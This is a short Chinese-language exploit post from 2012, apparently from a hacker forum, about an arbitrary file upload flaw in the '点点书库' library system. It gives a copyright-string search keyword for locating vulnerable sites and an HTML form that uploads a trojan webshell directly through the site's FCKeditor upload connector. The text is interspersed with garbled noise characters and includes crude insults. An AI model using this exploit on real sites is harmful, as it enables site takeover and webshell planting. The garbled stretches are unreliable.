主题:图书馆系统任意文件上传漏洞2 u7 [ _- H, W# ~- Q' F1 L- u& o1 ~1 d
作者:冰锋刺客+ o a, K$ {8 a1 d3 e0 K
厂商:点击书(dianjishu.com)
5 J/ q, K$ x/ c/ V$ E 日期:2012-6-21
4 J2 P+ {3 H- _& @! j! E! |
4 u& R! [+ t& o7 Z7 oI 概述
I! S. J" u+ x! x. T 点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell7 L8 J; r, L# Q3 d, X' W
II 简介# ?1 ~7 _- N( \* P
关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"
) c. Z/ Z3 W- g8 [1 O 补充一个漏洞$ q; ^. ?3 r$ Z& L- H
<form id="frmUpload" enctype="multipart/form-data"+ P/ ~5 \" h {
action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>" p! K- ~1 ~0 Y& J6 R% v
<input id="btnUpload" type="submit" value="操翻他">& d& q: V6 Q9 l$ @$ h0 e
</form>. M b8 E8 _: H: s F* R( M7 t- ]
你们懂的
' ?8 u% `9 j$ w 那傻逼提供还需要改包.* |' a8 u. E4 f: ]8 k
自己看了下源代码发现fckeditor
7 ~& Q4 v0 K+ l9 x 直接秒杀
! n& T$ w6 B) W2 a |